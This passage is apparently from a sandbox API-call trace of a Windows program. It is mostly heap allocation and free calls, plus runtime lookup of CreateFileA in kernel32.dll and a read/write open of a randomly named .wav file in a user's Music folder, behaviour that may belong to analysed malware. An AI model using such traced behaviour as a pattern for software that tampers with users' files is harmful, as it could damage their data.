Flags=0x0, Size=0x10) returned 0x88cc70 [0038.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.418] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.420] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce50 [0038.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.421] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce50 [0038.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.421] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c) returned 0x7ab260 [0038.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", cchWideChar=60, lpMultiByteStr=0x7ab260, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", lpUsedDefaultChar=0x0) returned 60 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.422] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sg2jce2ou9yef2qqfr-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=60, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x78) returned 0x7800d0 [0038.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=60, lpWideCharStr=0x7800d0, cchWideChar=60 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav") returned 60 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, 